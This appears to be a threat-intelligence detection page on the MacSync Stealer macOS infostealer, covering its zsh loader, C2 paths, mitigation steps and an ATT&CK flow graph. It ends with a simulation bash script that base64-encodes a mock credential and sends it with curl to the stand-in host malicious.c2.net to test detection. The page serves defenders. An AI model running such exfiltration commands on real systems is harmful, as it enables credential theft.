Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
MacSync Stealer is a macOS information-stealing malware offered through a malware-as-a-service model. It relies on a multi-stage zsh loader that reaches out to a rotating pool of command-and-control domains to exfiltrate stolen information, including passwords and cryptocurrency wallet credentials. The loader transmits clear-text passwords through a query-string parameter and uploads a ZIP archive of collected data in 10 MiB chunks. Its infrastructure rotation strategy depends on a static API key reused across several domains together with a per-build hexadecimal token.
Investigation
RST Cloud detected a download attempt from the newly registered domain jacksonvillemma.com and captured the Stage 2 zsh loader within an hour. Static analysis exposed the loader’s token, API key, and command-and-control path trio: /curl, /dynamic, and /gate. Additional pivoting based on those URI patterns revealed a cluster of roughly twelve suspected command-and-control domains active between February and May 2026. Four of those domains were confirmed to share the same API key, while the others were linked through matching URI behavior alone.
Mitigation
Defenders should block all known MacSync command-and-control domains and monitor for the distinct URL path patterns used by the malware. Proxy and DNS logs should be reviewed for requests containing /curl, /dynamic, and /gate, as well as for the shortened Chrome-like macOS user-agent string tied to the loader. Security teams should also detect creation of /tmp/osalogging.zip and watch for zsh processes that execute base64 -D, gunzip, and eval in combination.
Response
If a matching indicator is found, isolate the affected endpoint immediately, terminate the malicious zsh process, and collect memory for analysis of any AppleScript payloads. Reset exposed user passwords and invalidate compromised credentials stored in the macOS keychain. Detection logic should also be updated with the observed token, API key, and user-agent patterns to reduce the risk of future compromise.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#cccccc classDef process fill:#ccffcc %% Nodes initial_access_phishing["<b>Technique</b> – T1566 Phishing<br/><b>Description</b>: Malvertising delivers a script that runs curl to fetch the Stageu202f2 Zsh loader from a C2 domain."] class initial_access_phishing action tool_curl["<b>Tool</b> – curl<br/><b>Description</b>: Commandu2011line utility used to download the Stageu202f2 loader."] class tool_curl tool defense_obfuscate_compile["<b>Technique</b> – T1027.004 Compile After Delivery<br/><b>Description</b>: Zsh wrapper contains a base64u2011gzip payload that is decoded and executed with eval."] class defense_obfuscate_compile action defense_embedded_payload["<b>Technique</b> – T1027.009 Embedded Payloads<br/><b>Description</b>: Payload is embedded as a base64u2011encoded, gzipu2011compressed blob inside the wrapper."] class defense_embedded_payload action defense_stripped_payload["<b>Technique</b> – T1027.008 Stripped Payloads<br/><b>Description</b>: Wrapper is stripped of identifiable strings, relying on runtime decoding."] class defense_stripped_payload action defense_dynamic_api["<b>Technique</b> – T1027.007 Dynamic API Resolution<br/><b>Description</b>: HTTP requests include a static apiu2011key header and a custom truncated Useru2011Agent."] class defense_dynamic_api action execution_shared_modules["<b>Technique</b> – T1129 Shared Modules<br/><b>Description</b>: Decoded script is executed as a background Zsh function via eval."] class execution_shared_modules action process_zsh["<b>Process</b> – Zsh<br/><b>Description</b>: Shell used to run the decoded malicious function."] class process_zsh process cred_os_dumping["<b>Technique</b> – T1003 OS Credential Dumping<br/><b>Description</b>: AppleScript retrieved from C2 extracts macOS Keychain entries."] class cred_os_dumping action cred_browser["<b>Technique</b> – T1555.003 Credentials from Web Browsers<br/><b>Description</b>: Same AppleScript harvests stored credentials from Chromium browsers and cryptou2011wallet extensions."] class cred_browser action cred_unsecured_files["<b>Technique</b> – T1552.001 Unsecured Credentials in Files<br/><b>Description</b>: Harvested data written to /tmp/osalogging.zip before exfiltration."] class cred_unsecured_files action file_archive["<b>File</b> – /tmp/osalogging.zip<br/><b>Description</b>: Zip archive containing collected credentials."] class file_archive file collection_archive["<b>Technique</b> – T1560 Archive Collected Data<br/><b>Description</b>: Data compressed into a zip archive for staging."] class collection_archive action command_control_dynamic["<b>Technique</b> – T1568 Dynamic Resolution<br/><b>Description</b>: Malware contacts C2 using HTTP paths discovered via pattern matching."] class command_control_dynamic action cred_valid_accounts["<b>Technique</b> – T1078 Valid Accounts<br/><b>Description</b>: User macOS password sent in cleartext via u201c&pwd=u201d query parameter, giving attacker legitimate credentials."] class cred_valid_accounts action %% Connections initial_access_phishing –>|uses| tool_curl tool_curl –>|delivers| defense_obfuscate_compile defense_obfuscate_compile –>|includes| defense_embedded_payload defense_embedded_payload –>|includes| defense_stripped_payload defense_stripped_payload –>|uses| defense_dynamic_api defense_dynamic_api –>|enables| execution_shared_modules execution_shared_modules –>|executes| process_zsh process_zsh –>|runs| cred_os_dumping cred_os_dumping –>|runs| cred_browser cred_browser –>|writes to| cred_unsecured_files cred_unsecured_files –>|creates| file_archive file_archive –>|used by| collection_archive collection_archive –>|sent to| command_control_dynamic command_control_dynamic –>|provides| cred_valid_accounts "
Attack Flow
Detections
Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
View
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
View
Archive Was Created In MacOS Temporary Folder (via file_event)
View
IOCs (HashSha256) to detect: MacSync Stealer: C2 Infrastructure Rotation
View
IOCs (HashSha1) to detect: MacSync Stealer: C2 Infrastructure Rotation
View
IOCs (HashMd5) to detect: MacSync Stealer: C2 Infrastructure Rotation
View
MacSync Stealer C2 Communication Detection [Proxy]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An adversary has deployed the MacSync stealer binary onto a compromised macOS workstation. The stealer extracts the current user’s macOS keychain password, base64‑encodes it, and exfiltrates it via an HTTP GET request through the corporate proxy. The request targets the known C2 endpointhttps://malicious.c2.net/dynamic?txd=<payload>. Because the proxy logs full URLs, the detection rule will see thedynamic?txd=substring and raise an alert. -
Regression Test Script:
#!/bin/bash # macsync_stealer_simulation.sh # Simulates MacSync stealer C2 communication to trigger the detection rule. PROXY="http://proxy.corp.local:3128" C2_BASE="https://malicious.c2.net/dynamic?txd=" # 1️⃣ Extract a mock password (for demo purposes use the current user name) PASSWORD="$(whoami):P@ssw0rd!" # 2️⃣ Encode the credential in base64 (emulates MacSync's encoding step) ENCODED=$(printf "%s" "$PASSWORD" | base64) # 3️⃣ Construct the full malicious URL MALICIOUS_URL="${C2_BASE}${ENCODED}" # 4️⃣ Send the request via the corporate proxy curl -x "$PROXY" "$MALICIOUS_URL" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" echo "Simulation executed – payload sent to $MALICIOUS_URL" -
Cleanup Commands:
# Remove any temporary files (none created) and optionally purge proxy cache echo "Cleaning up simulation artifacts..." # If using Squid, purge the URL from the cache to avoid repeated hits sudo squidclient -m PURGE "https://malicious.c2.net/dynamic?txd=*"